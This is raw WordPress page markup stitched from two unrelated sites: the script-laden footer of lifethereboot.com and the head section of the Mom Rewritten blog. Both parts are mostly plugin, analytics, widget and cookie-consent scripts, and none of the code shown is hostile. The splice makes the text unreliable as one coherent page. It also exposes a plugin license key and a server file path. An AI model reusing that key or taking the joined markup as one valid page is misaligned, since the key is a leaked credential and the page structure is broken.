pswp__button--arrow--right" title="Next (arrow right)"> </button> <div class="pswp__caption"> <div class="pswp__caption__center"></div> </div> </div> </div> </div> <!-- / photoswipe --> </div> <!-- / wrapper --> <div class="site-navigation-overlay"></div> <script async>(function(s,u,m,o,j,v){j=u.createElement(m);v=u.getElementsByTagName(m)[0];j.async=1;j.src=o;j.dataset.sumoSiteId='43ec6800b051cf00d3745300e7d97c0012e6a000c494340073cdfc006cd0ae00';j.dataset.sumoPlatform='wordpress';v.parentNode.insertBefore(j,v)})(window,document,'script','//load.sumo.com/');</script> <script type="application/javascript"> var ajaxurl = "https://lifethereboot.com/wp-admin/admin-ajax.php"; function sumo_add_woocommerce_coupon(code) { jQuery.post(ajaxurl, { action: 'sumo_add_woocommerce_coupon', code: code, }); } function sumo_remove_woocommerce_coupon(code) { jQuery.post(ajaxurl, { action: 'sumo_remove_woocommerce_coupon', code: code, }); } function sumo_get_woocommerce_cart_subtotal(callback) { jQuery.ajax({ method: 'POST', url: ajaxurl, dataType: 'html', data: { action: 'sumo_get_woocommerce_cart_subtotal', }, success: function(subtotal) { return callback(null, subtotal); }, error: function(err) { return callback(err, 0); } }); } </script> <!-- twitter JS End --> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="https://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script> <script> jQuery( document ).ready(function( $ ) { setTimeout(function() { jQuery('.sfsi_outr_div').css({'z-index':'1000000',opacity:1}); jQuery('.sfsi_outr_div').fadeIn(200); jQuery('.sfsi_FrntInner_chg').fadeIn(200); } ,6000); }); </script> <script> jQuery(document).ready(function(e) { jQuery("body").addClass("sfsi_2.22") }); function sfsi_processfurther(ref) { var feed_id = 'OFhMazZnbXJ5c1A0L0ZPRU9id2xqaXZ5aGJRRndGQTk3elBMNm5HcjZacnVrelNybXh3V2daS2J2b1NNMzh2aFlUc1NzU0ExVkZuaXJ1dElUT3NXaVRDbkJseG5nR29QclBTWDF1eDdvMlRyMDNzRHRRc3RxMG1UWEdDL0ExS3Z8Zlp2VCtHa05GUXJGcm9qUHNUaUc1MFREMGJkWGY5T1lCQXh4RTQvNXgwVT0='; var feedtype = 8; var email = jQuery(ref).find('input[name="data[Widget][email]"]').val(); var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/; if ((email != "Enter your email") && (filter.test(email))) { if (feedtype == "8") { var url ="https://www.specificfeeds.com/widgets/subscribeWidget/"+feed_id+"/"+feedtype; window.open('', "popupwindow", "scrollbars=yes,width=1080,height=760"); ref.action=url; ref.target="popupwindow"; return true; }else{ return false } } else { alert("Please enter email address"); jQuery(ref).find('input[name="data[Widget][email]"]').focus(); return false; } } </script> <style type="text/css" aria-selected="true"> .sfsi_subscribe_Popinner { width: 100% !important; height: auto !important; border: 1px solid #b5b5b5 !important; padding: 18px 0px !important; background-color: #ffffff !important; } .sfsi_subscribe_Popinner form { margin: 0 20px !important; } .sfsi_subscribe_Popinner h5 { font-family: Helvetica,Arial,sans-serif !important; font-weight: bold !important; color: #000000 !important; font-size: 16px !important; text-align: center !important; margin: 0 0 10px !important; padding: 0 !important; } .sfsi_subscription_form_field { margin: 5px 0 !important; width: 100% !important; display: inline-flex; display: -webkit-inline-flex; } .sfsi_subscription_form_field input { width: 100% !important; padding: 10px 0px !important; } .sfsi_subscribe_Popinner input[type=email] { font-family: Helvetica,Arial,sans-serif !important; font-style: normal !important; color: #000000 !important; font-size: 14px !important; text-align: center !important; } .sfsi_subscribe_Popinner input[type=email]::-webkit-input-placeholder { font-family: Helvetica,Arial,sans-serif !important; font-style: normal !important; color: #000000 !important; font-size: 14px !important; text-align: center !important; } .sfsi_subscribe_Popinner input[type=email]:-moz-placeholder { /* Firefox 18- */ font-family: Helvetica,Arial,sans-serif !important; font-style: normal !important; color: #000000 !important; font-size: 14px !important; text-align: center !important; } .sfsi_subscribe_Popinner input[type=email]::-moz-placeholder { /* Firefox 19+ */ font-family: Helvetica,Arial,sans-serif !important; font-style: normal !important; color: #000000 !important; font-size: 14px !important; text-align: center !important; } .sfsi_subscribe_Popinner input[type=email]:-ms-input-placeholder { font-family: Helvetica,Arial,sans-serif !important; font-style: normal !important; color: #000000 !important; font-size: 14px !important; text-align: center !important; } .sfsi_subscribe_Popinner input[type=submit] { font-family: Helvetica,Arial,sans-serif !important; font-weight: bold !important; color: #000000 !important; font-size: 16px !important; text-align: center !important; background-color: #dedede !important; } </style> <!-- VigLink: http://viglink.com --> <script type="text/javascript"> var vglnk = { key: '4efaea279f4c94bbed4f7f16cbe2e908' }; (function(d, t) { var s = d.createElement(t); s.type = 'text/javascript'; s.async = true; s.src = '//cdn.viglink.com/api/vglnk.js?key=' + vglnk.key; var r = d.getElementsByTagName(t)[0]; r.parentNode.insertBefore(s, r); }(document, 'script')); </script> <!-- end VigLink --> <div id="wpcp-error-message" class="msgmsg-box-wpcp warning-wpcp hideme"><span>error: </span>Content is protected !!</div> <script> var timeout_result; function show_wpcp_message(smessage) { if (smessage !== "") { var smessage_text = '<span>Alert: </span>'+smessage; document.getElementById("wpcp-error-message").innerHTML = smessage_text; document.getElementById("wpcp-error-message").className = "msgmsg-box-wpcp warning-wpcp showme"; clearTimeout(timeout_result); timeout_result = setTimeout(hide_message, 3000); } } function hide_message() { document.getElementById("wpcp-error-message").className = "msgmsg-box-wpcp warning-wpcp hideme"; } </script> <style type="text/css"> #wpcp-error-message { direction: ltr; text-align: center; transition: opacity 900ms ease 0s; z-index: 99999999; } .hideme { opacity:0; visibility: hidden; } .showme { opacity:1; visibility: visible; } .msgmsg-box-wpcp { border-radius: 10px; color: #555; font-family: Tahoma; font-size: 11px; margin: 10px; padding: 10px 36px; position: fixed; width: 255px; top: 50%; left: 50%; margin-top: -10px; margin-left: -130px; -webkit-box-shadow: 0px 0px 34px 2px rgba(242,191,191,1); -moz-box-shadow: 0px 0px 34px 2px rgba(242,191,191,1); box-shadow: 0px 0px 34px 2px rgba(242,191,191,1); } .msgmsg-box-wpcp span { font-weight:bold; text-transform:uppercase; } .error-wpcp { background:#ffecec url('https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/wp-content-copy-protector/images/error.png') no-repeat 10px 50%; border:1px solid #f5aca6; } .success { background:#e9ffd9 url('https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/wp-content-copy-protector/images/success.png') no-repeat 10px 50%; border:1px solid #a6ca8a; } .warning-wpcp { background:#ffecec url('https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/wp-content-copy-protector/images/warning.png') no-repeat 10px 50%; border:1px solid #f5aca6; } .notice { background:#e3f7fc url('https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/wp-content-copy-protector/images/notice.png') no-repeat 10px 50%; border:1px solid #8ed9f6; } </style> <script type="text/javascript"> function gdprDisplayPopup() { //document.getElementByID("myModalgdrp").style.display = "block"; alert("ok"); } function tekGdprSetCookie(cname, cvalue, exdays) {//create js cookie var d = new Date(); d.setTime(d.getTime() + (exdays*24*60*60*1000)); var expires = "expires="+ d.toUTCString(); document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/"; } function gdrpSetCookie() {//ajax and js cookie function call var set=2; var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { set=this.responseText; } }; xhttp.open("POST", "https://lifethereboot.com/wp-content/plugins/wpgdpr_g8zuDP-1/update.php", true); xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhttp.send("gdrpset=1"); tekGdprSetCookie('TEKGDRP','created',3650); document.getElementById("myModalgdrp").style.display = "none"; } </script> <style> .wpgdpr-modal-dialogg{bottom:0px;right:0px;margin:0px;position:fixed;} </style> <div id="myModalgdrp" class="wpgdpr-modal-dialogg gdprboxcolor" style="padding:10px;border-radius:5px;max-width:60%;min-width:20%;border:1px solid #DCDCDC;"><br /><h4 class="gdprtxt"> <p>Important<br />This site makes use of cookies which may contain tracking information about visitors. By continuing to browse this site you agree to our use of cookies.</p></h4> <div> <button name="gdprcookieaccept" class="gdpracceptbtn btn btn-primary pull-right" onclick="gdrpSetCookie()" style="float:right;margin-top:5px; margin-right:10px;" id="yes">OK</button> <form action="" method="post"><button type="submit" name="dontacceptgdprcookie" class="gdprdntacceptbtn btn btn-default pull-right" style="float:right;margin-top:5px;margin-right:5px;" onclick="WPGdprClearListCookies()" value=""> </button> </form> </div> </div> <style> .gdprboxcolor{background-color:#e6ffff;}.gdprtxt{color:#000000;} .wpgdpr-modal-dialogg{z-index:10000;} #myModalgdrp { max-width:40% !important; } @media only screen and (max-width:700px) { #myModalgdrp { max-width:100% !important; } } button.gdpracceptbtn { color: white !important; background-color: #4d88ff !important; border-radius: 5px; } button.gdprdntacceptbtn { color: white; background-color: #b30047!important; border-radius: 5px; } </style> <style></style> <script type="text/javascript"> function getGdprCookieCookie(name) { var value = "; " + document.cookie; var parts = value.split("; " + name + "="); if (parts.length == 2){ return parts.pop().split(";").shift();} else {return null;} } function doHideCookieBox() { var myCookie =getGdprCookieCookie("TEKGDRP"); if (myCookie != null) { document.getElementById("myModalgdrp").style.display= "none"; } } doHideCookieBox(); </script> <div style="display:none"> </div> <script>(function() {function addEventListener(element,event,handler) { if(element.addEventListener) { element.addEventListener(event,handler, false); } else if(element.attachEvent){ element.attachEvent('on'+event,handler); } }function maybePrefixUrlField() { if(this.value.trim() !== '' && this.value.indexOf('http') !== 0) { this.value = "http://" + this.value; } } var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]'); if( urlFields && urlFields.length > 0 ) { for( var j=0; j < urlFields.length; j++ ) { addEventListener(urlFields[j],'blur',maybePrefixUrlField); } }/* test if browser supports date fields */ var testInput = document.createElement('input'); testInput.setAttribute('type', 'date'); if( testInput.type !== 'date') { /* add placeholder & pattern to all date fields */ var dateFields = document.querySelectorAll('.mc4wp-form input[type="date"]'); for(var i=0; i<dateFields.length; i++) { if(!dateFields[i].placeholder) { dateFields[i].placeholder = 'YYYY-MM-DD'; } if(!dateFields[i].pattern) { dateFields[i].pattern = '[0-9]{4}-(0[1-9]|1[012])-(0[1-9]|1[0-9]|2[0-9]|3[01])'; } } } })();</script> <script type="text/javascript"> var c = document.body.className; c = c.replace(/woocommerce-no-js/, 'woocommerce-js'); document.body.className = c; </script> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.4"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script><link rel='stylesheet' id='pm_lgate_front_css-css' href='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/pm-link-gate/modules/css/front.css?ver=1529271601' type='text/css' media='all' /> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/photon/photon.min.js'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript' defer async src='https://cdn001.milotree.com/container/008164milotree.js?ver=1.2.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var thirsty_global_vars = {"home_url":"\/\/lifethereboot.com","ajax_url":"https:\/\/lifethereboot.com\/wp-admin\/admin-ajax.php","link_fixer_enabled":"yes","link_prefix":"recommends","link_prefixes":["recommends"],"post_id":"50","enable_record_stats":"yes","enable_js_redirect":"yes","disable_thirstylink_class":""}; /* ]]> */ </script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/thirstyaffiliates/js/app/ta.js?ver=1554265864'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/ui/core.min.js'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/ultimate-social-media-icons/js/shuffle/modernizr.custom.min.js?ver=1557185827'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/ultimate-social-media-icons/js/shuffle/jquery.shuffle.min.js?ver=1557185827'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/ultimate-social-media-icons/js/shuffle/random-shuffle-min.js?ver=1557185827'></script> <script type='text/javascript'> /* <![CDATA[ */ var sfsi_icon_ajax_object = {"ajax_url":"https:\/\/lifethereboot.com\/wp-admin\/admin-ajax.php"}; var sfsi_icon_ajax_object = {"ajax_url":"https:\/\/lifethereboot.com\/wp-admin\/admin-ajax.php","plugin_url":"https:\/\/lifethereboot.com\/wp-content\/plugins\/ultimate-social-media-icons\/"}; /* ]]> */ </script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/ultimate-social-media-icons/js/custom.js?ver=1557185830'></script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.6.2/assets/js/jquery-blockui/jquery.blockUI.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/lifethereboot.com\/cart\/","is_cart":"","cart_redirect_after_add":"no"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.6.2/assets/js/frontend/add-to-cart.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.6.2/assets/js/js-cookie/js.cookie.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.6.2/assets/js/frontend/woocommerce.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_f9e5e793b811cef571b7cd260cd87546","fragment_name":"wc_fragments_f9e5e793b811cef571b7cd260cd87546","request_timeout":"5000"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.6.2/assets/js/frontend/cart-fragments.min.js'></script> <script type='text/javascript'> jQuery( 'body' ).bind( 'wc_fragments_refreshed', function() { jQuery( 'body' ).trigger( 'jetpack-lazy-images-load' ); } ); </script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/ui/widget.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/ui/mouse.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/ui/sortable.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/ui/draggable.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/ui/droppable.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/suggest.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpurp_servings = {"precision":"2","decimal_character":"."}; var wpurp_print = {"ajaxurl":"https:\/\/lifethereboot.com\/wp-admin\/admin-ajax.php?wpurp_ajax=1","nonce":"da632bbaf5","custom_print_css":"","coreUrl":"https:\/\/lifethereboot.com\/wp-content\/plugins\/wp-ultimate-recipe","premiumUrl":"","title":"","permalinks":"\/%postname%\/"}; var wpurp_responsive_data = {"breakpoint":"500"}; var wpurp_sharing_buttons = {"facebook_lang":"en_US","twitter_lang":"en","google_lang":"en-US"}; /* ]]> */ </script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/wp-ultimate-recipe/assets/wpurp-public.js?ver=1551297525'></script> <script type='text/javascript'> /* <![CDATA[ */ var socialWarfare = {"addons":[{"name":"Social Warfare - Pro","key":"pro","core_required":"3.3.0","product_id":63157,"store_url":"https:\/\/warfareplugins.com","version":"3.6.0","filepath":"\/home\/lifether\/public_html\/wp-content\/plugins\/social-warfare-pro\/social-warfare-pro.php","license_key":"0f678ea50d56b9b20041b852b054d3a7","is_registered":true},"pro"],"post_id":"50","floatBeforeContent":""}; /* ]]> */ </script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=1557088977'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/js/pace.min.js?ver=1545347210'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/js/modernizr.js?ver=1545347210'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/js/jquery.justifiedGallery.min.js?ver=1545347210'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/js/selectivizr-min.js?ver=1545347210'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/js/cssua.min.js?ver=1545347210'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/js/slick.min.js?ver=1545347210'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/js/jquery.sticky.js?ver=1545347210'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/js/photoswipe.min.js?ver=1545347210'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/js/photoswipe-ui-default.min.js?ver=1545347210'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/js/jquery.fitvids.js?ver=1545347210'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/js/jquery.fittext.js?ver=1545347210'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/js/masonry.min.js?ver=1545347210'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/js/jquery.scrollUp.min.js?ver=1545347210'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/themes/writee-pro/assets/js/main.js?ver=1545347210'></script> <script type='text/javascript'> jQuery(document).ready(function(){ jQuery.scrollUp({scrollName: 'scrollUp', // Element ID scrollFrom: 'top', // 'top' or 'bottom' animation: 'fade', // Fade, slide, none scrollText: '&#xf077;', // Text for element, can contain HTML activeOverlay: '#00FFFF', zIndex: 9999 // Z-Index for the overlay });}); </script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/twitter-timeline.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/lazy-images/js/lazy-images.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/wp-embed.min.js'></script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/pm-link-gate/modules/js/front.js?ver=1529271601'></script> <script type='text/javascript'> /* <![CDATA[ */ var mc4wp_forms_config = []; /* ]]> */ </script> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/mailchimp-for-wp/assets/js/forms-api.min.js?ver=1557363948'></script> <!--[if lte IE 9]> <script type='text/javascript' src='https://lifethereboot-zhkq23qk54pebz.stackpathdns.com/wp-content/plugins/mailchimp-for-wp/assets/js/third-party/placeholders.min.js?ver=1557363948'></script> <![endif]--> <script type="text/javascript"> var swp_nonce = "e150f21dd5";var swpFloatBeforeContent = false;var swpClickTracking = true; swpPinIt={"enabled":false};</script><script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3.1',blog:'143786843',post:'0',tz:'-5',srv:'lifethereboot.com'} ]); _stq.push([ 'clickTrackerInit', '143786843', '0' ]); </script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US"> <head > <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>Mom Rewritten</title> <!-- This site is optimized with the Yoast SEO Premium plugin v11.2 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Little changes that make a big difference! Lifestyle blog about simple living, positive parenting, Disney and family travel."/> <link rel="canonical" href="https://www.momrewritten.com/" /> <link rel="next" href="https://www.momrewritten.com/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Mom Rewritten" /> <meta property="og:description" content="Little changes that make a big difference! Lifestyle blog about simple living, positive parenting, Disney and family travel." /> <meta property="og:url" content="https://www.momrewritten.com/" /> <meta property="og:site_name" content="Mom Rewritten" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="Little changes that make a big difference! Lifestyle blog about simple living, positive parenting, Disney and family travel." /> <meta name="twitter:title" content="Mom Rewritten" /> <meta name="twitter:site" content="@momrewritten" /> <meta name="google-site-verification" content="qPrWSVKQzyqjJT2hNHYq5kMxf8y7YLKqPYKYU_4ImFs" /> <meta name="p:domain_verify" content="7d983f6db7b84f79b870dba1c2415ac2" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.momrewritten.com/#organization","name":"Mom Rewritten","url":"https://www.momrewritten.com/","sameAs":["https://www.facebook.com/momrewritten/","https://www.instagram.com/momrewritten/","https://www.linkedin.com/in/julie-bigboy-027951b9/","https://www.youtube.com/channel/UC3fj6YadzNhYXXx8I5AIsFw?view_as=subscriber","https://www.pinterest.com/momrewritten/","https://twitter.com/momrewritten"],"logo":{"@type":"ImageObject","@id":"https://www.momrewritten.com/#logo","url":"http://momrewritten.com/wp-content/uploads/2017/07/Mom-Rewritten-Blog-Logo.png","caption":"Mom Rewritten"},"image":{"@id":"https://www.momrewritten.com/#logo"}},{"@type":"WebSite","@id":"https://www.momrewritten.com/#website","url":"https://www.momrewritten.com/","name":"Mom Rewritten","publisher":{"@id":"https://www.momrewritten.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://www.momrewritten.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://www.momrewritten.com/#webpage","url":"https://www.momrewritten.com/","inLanguage":"en-US","name":"Mom Rewritten","isPartOf":{"@id":"https://www.momrewritten.com/#website"},"about":{"@id":"https://www.momrewritten.com/#organization"},"description":"Little changes that make a big difference! Lifestyle blog about simple living, positive parenting, Disney and family travel."}]}</script> <!-- / Yoast SEO Premium plugin. --> <link rel='dns-prefetch' href='//scripts.mediavine.com' /> <link rel='dns-prefetch' href='//www.youtube.com' /> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Mom Rewritten &raquo; Feed" href="https://www.momrewritten.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Mom Rewritten &raquo; Comments Feed" href="https://www.momrewritten.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.momrewritten.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='pt-cv-public-style-css' href='https://www.momrewritten.com/wp-content/plugins/content-views-query-and-display-post-page/public/assets/css/cv.css?ver=2.1.3.3' type='text/css' media='all' /> <link rel='stylesheet' id='tasteful-css' href='https://www.momrewritten.com/wp-content/themes/restored316-tasteful/style.css?ver=1.0.4' type='text/css' media='all' /> <style id='tasteful-inline-css' type='text/css'> a:hover, .site-description, a.more-link, .site-header .genesis-nav-menu a:hover, .genesis-nav-menu li:hover, .genesis-nav-menu a:hover, .genesis-nav-menu .current-menu-item > a, .entry-title a:hover, .footer-widgets .entry-title a:hover, .archive-pagination li a:hover, .archive-pagination li.active a { color: #ff6947; } .enews-widget input[type="submit"]:hover, .more-from-category a:hover, button:hover, input[type="button"]:hover, input[type="reset"]:hover, input[type="submit"]:hover, .button:hover, .entry-content .button:hover, .content #genesis-responsive-slider a.more-link:hover { background: #ff6947; } } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.momrewritten.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='wpda_youtube_gutenberg_css-css' href='https://www.momrewritten.com/wp-content/plugins/youtube-video-player/admin/gutenberg/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://www.momrewritten.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='sb_instagram_styles-css' href='https://www.momrewritten.com/wp-content/plugins/instagram-feed/css/sb-instagram.min.css?ver=1.12' type='text/css' media='all' /> <link rel='stylesheet' id='sb-font-awesome-css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='wpp-popup-styles-css' href='https://www.momrewritten.com/wp-content/plugins/m-wp-popup/css/popup-styles.css?ver=1.0' type='text/css' media='all' /> <link rel='stylesheet' id='google-font-css' href='//fonts.googleapis.com/css?family=Roboto%3A400%2C100%2C100italic%2C300italic%2C300%2C400italic%2C500%2C500italic%2C700%2C700italic%2C900%2C900italic%7CLato%3A400%2C100%2C100italic%2C300%2C300italic%2C400italic%2C700%2C700italic%2C900%2C900italic%7COpen+Sans%3A400%2C300%2C300italic%2C400italic%2C600italic%2C600%2C700%2C700italic%2C800italic%2C800&#038;ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://www.momrewritten.com/wp-includes/css/dashicons.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='simple-social-icons-font-css' href='https://www.momrewritten.com/wp-content/plugins/simple-social-icons/css/style.css?ver=3.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='thickbox-css' href='https://www.momrewritten.com/wp-includes/js/thickbox/thickbox.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='front_end_youtube_style-css' href='https://www.momrewritten.com/wp-content/plugins/youtube-video-player/fornt_end/styles/baze_styles_youtube.css?ver=5.2' type='text/css' media='all' /> <script type='text/javascript' src='https://www.momrewritten.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.momrewritten.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script 